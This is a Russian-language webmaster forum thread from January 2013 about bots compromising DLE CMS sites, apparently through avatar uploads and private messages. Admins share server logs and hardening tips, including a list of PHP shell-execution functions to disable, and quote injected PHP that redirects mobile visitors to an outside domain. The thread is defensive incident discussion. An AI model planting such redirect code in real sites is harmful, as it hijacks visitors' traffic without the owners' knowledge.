Вирус на сайте cms dle

На одном из вебфорумов один человек выкладывал лог что делает этот бот tehApocalypse

Line 7541: 151.0.7.30 - - [12/Jan/2013:16:07:27 +0400] "POST /engine/ajax/pm.php HTTP/1.0" 200 2163 "http://site.ru/uploads/fotos/foto_209.gif" "-"

Line 7542: 151.0.7.30 - - [12/Jan/2013:16:07:27 +0400] "GET /index.php?subaction=userinfo&user=tehApocalypse HTTP/1.0" 200 32162 "http://site.ru/engine/ajax/pm.php" "-"

Заливает картинку аватар, Далее отправляет личное сообщение (я так понимаю с адресом аватарки).

Аватарку за собой потом стирает с сервера.

вы писали что то типа "я выкладываю" и не указывали источник.

позволил себе предположить, что это ваши решения. ну раз нет, так нет. не в этом суть. а скорее в том, что они уже существует относительно давно, а преподносятся как нечто неизвестное. проехали.

пожалуйста, ответьте все таки на вопрос, в каком файле проверка превышения int не работает и в какой версии дле? я не подкалываю, действительно интересно.

P.S. немного покапитаню, поля типа intval в mysql не существует :)

в mySQL - int

А при проверке в php-файле intval, ок? Возможно, я неправильно выразился или Вы не так поняли.

В какой версии? Сейчас точно не скажу, но 9-ая линейка. В каком файле? Я Вам намёк дал, такая небольшая недоработочка вызывает крэш mySQL => можно узнать немного полезной информации. Не буду здесь всё описывать, ибо злодеи тоже читают сёрч.

это злобный троллинг? Всё, теперь точно прекращаю общение. Удачи!

вы считаете, что в ветку форума, где народ пытается найти уже существующую уязвимость, заходят злодеи, чтобы найти новые уязвимости? :) разве что над нами постебаться ;)

просто если речь о постраничной навигации, то все давно прикрыто. начиная с версии 8, а в последних и еще одно условие добавили на величину номера страницы

об этом, в принципе, на античате писали, я думаю вы в курсе.

Там только объявления класса, и больше нечего, так что он особо без надобности.

А есть может какой смысл в том чтобы права на запись убрать с config.php, dbconfig.php, init.php, engine.php, index.php, .htaccess?

для всех кроме config.php можно, так как настойки не смогут сохранятся. но врядли смысл есть.

Также полезно отключить функции:

exec, system, popen, shell_exec, proc_open, proc_close, proc_nice, get_current_user, getmyuid, posix_getpwuid, apache_get_modules, virtual, posix_getgrgid, getmyinode, fileowner, filegroup, getmypid, apache_get_version, apache_getenv, apache_note, apache_setenv, dl, ini_restore, openlog, syslog, highlight_file, show_source, symlink, disk_total_space, ini_get_all, get_current_user, posix_uname

хотя это тоже не панацея, но от взлома в начале этого месяца когда через minify.php в cache/system ломали и удаляли .htaccess. помогало....

Если изменения вносят в файлы, которые движку не нужны для записи, то можно например поставить другого владельца и группу (при правильных настройках сервера.)

Востанавливайте из бэкаппа, запрещайте загрузку файлов к вам, в том числе и аватаров...

Line 7541: 151.0.7.30 - - [12/Jan/2013:16:07:27 +0400] "POST /engine/ajax/pm.php HTTP/1.0" 200 2163 "http://site.ru/uploads/fotos/foto_209.gif" "-"

Line 7542: 151.0.7.30 - - [12/Jan/2013:16:07:27 +0400] "GET /index.php?subaction=userinfo&user=tehApocalypse HTTP/1.0" 200 32162 "http://site.ru/engine/ajax/pm.php" "-"

Возможно это и оно но бот там не один. Я лично штук 20 удалил за прошедший месяц. Они в логах пишут что-то типо этого

2013/01/18 07:53:34 [error] 26858#0: *5488551 open() "/var/www/сайт.ru/user/airmaxzlt/+++++++++++++++++++++++++++++[+Activation+]+Result:+this+topic+already+exists;+chosen+nickname+"airmaxzlt";+logged+in;+success+(profile+was+registered+successfully,+but+there+is+no+permissions+for+creating+new+topic);" failed (2: No such file or directory), client: 59.58.156.214, server: сайт.ru, request: "GET /user/airmaxzlt/+++++++++++++++++++++++++++++%5B+Activation+%5D+Result:+this+topic+already+exists;+chosen+nickname+%22airmaxzlt%22;+logged+in;+success+%28profile+was+registered+successfully,+but+there+is+no+permissions+for+creating+new+topic%29; HTTP/1.0", host: "сайт.ru", referrer: "http://сайт.ru/user/airmaxzlt/+++++++++++++++++++++++++++++%5B+Activation+%5D+Result:+this+topic+already+exists;+chosen+nickname+%22airmaxzlt%22;+logged+in;+success+%28profile+was+registered+successfully,+but+there+is+no+permissions+for+creating+new+topic%29;"

или вот такое

2013/01/17 10:12:09 [error] 26858#0: *3232623 open() "/var/www/сайт.ru/user/NicadBatys++++++++++++++++++++++++++++++++++++++++++++Result:+forum+not+found+/+could+not+find+IP" failed (2: No such file or directory), client: 188.165.246.91, server: сайт.ru, request: "GET /user/NicadBatys++++++++++++++++++++++++++++++++++++++++++++Result:+forum+not+found+/+could+not+find+IP HTTP/1.0", host: "сайт.ru", referrer: "http://сайт.ru/user/NicadBatys++++++++++++++++++++++++++++++++++++++++++++Result:+forum+not+found+/+could+not+find+IP"

или

2013/01/15 19:57:04 [error] 1768#0: *322805 open() "/var/www/сайт.ru/http:/сайт.ru/++++++++++++++++++++++++++++++++++++++++++++Result:+error:+"Ошибка+регистрации+-+Код+безопасности+не+соответствует+отображённому+-+Регистрация";+chosen+nickname+"inselelar";+ReCaptcha+decoded;+(JS);+registered+(registering+only+mode+is+ON);" failed (2: No such file or directory), client: 190.74.185.56, server: сайт.ru, request: "GET /http://сайт.ru//++++++++++++++++++++++++++++++++++++++++++++Result:+error:+%22%CE%F8%E8%E1%EA%E0+%F0%E5%E3%E8%F1%F2%F0%E0%F6%E8%E8+-+%CA%EE%E4+%E1%E5%E7%EE%EF%E0%F1%ED%EE%F1%F2%E8+%ED%E5+%F1%EE%EE%F2%E2%E5%F2%F1%F2%E2%F3%E5%F2+%EE%F2%EE%E1%F0%E0%E6%B8%ED%ED%EE%EC%F3+-+%D0%E5%E3%E8%F1%F2%F0%E0%F6%E8%FF%22;+chosen+nickname+%22inselelar%22;+ReCaptcha+decoded;+%28JS%29;+registered+%28registering+only+mode+is+ON%29; HTTP/1.0", host: "сайт.ru", referrer: "http://сайт.ru/++++++++++++++++++++++++++++++++++++++++++++Result:+error:+%22%CE%F8%E8%E1%EA%E0+%F0%E5%E3%E8%F1%F2%F0%E0%F6%E8%E8+-+%CA%EE%E4+%E1%E5%E7%EE%EF%E0%F1%ED%EE%F1%F2%E8+%ED%E5+%F1%EE%EE%F2%E2%E5%F2%F1%F2%E2%F3%E5%F2+%EE%F2%EE%E1%F0%E0%E6%B8%ED%ED%EE%EC%F3+-+%D0%E5%E3%E8%F1%F2%F0%E0%F6%E8%FF%22;+chosen+nickname+%22inselelar%22;+ReCaptcha+decoded;+%28JS%29;+registered+%28registering+only+mode+is+ON%29;"

Это сейчас неудачно всё у ботов до патчей были статусы что всё ок типа, зарегался.

Могу сказать что таких ботов замечал и раньше, а ники с которыми они заходили были зареганы уже как пол года. Может это и не те боты) но как-то странно что у других они тоже регаются.

ЗЫ. tehApocalypse был зареган в тот день когда перестал идти трафик с мобильных устройств) т.е. 9 января сего года.

Какой смысл в этом?

Ну не смогут изменить настройки сайта, думаю им это нгафик не впало.

как уже сказал asmakovec2 , скорее всего уязвимость в Личных сообщениях

Заливают картинку gif Далее отправляет личное сообщение

Аватарку за собой потом стирает с сервера.

На одном моем Дле 9.5 именно так и было, по логам была аватарка но в папке ее небыло.

На сайтах где отключена регистрация новых юзеров проблем взлома нет.

---------- Добавлено 19.01.2013 в 13:53 ----------

$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");

$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");

$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");

$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");

$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");



if ($iphone || $android || $palmpre || $ipod || $berry === true) { 

    header('Location: http://statuses.ws/');

}

Тут скорее всего определенные версии движка, в одних есть дырка в других нету, либо запрет в htaccess.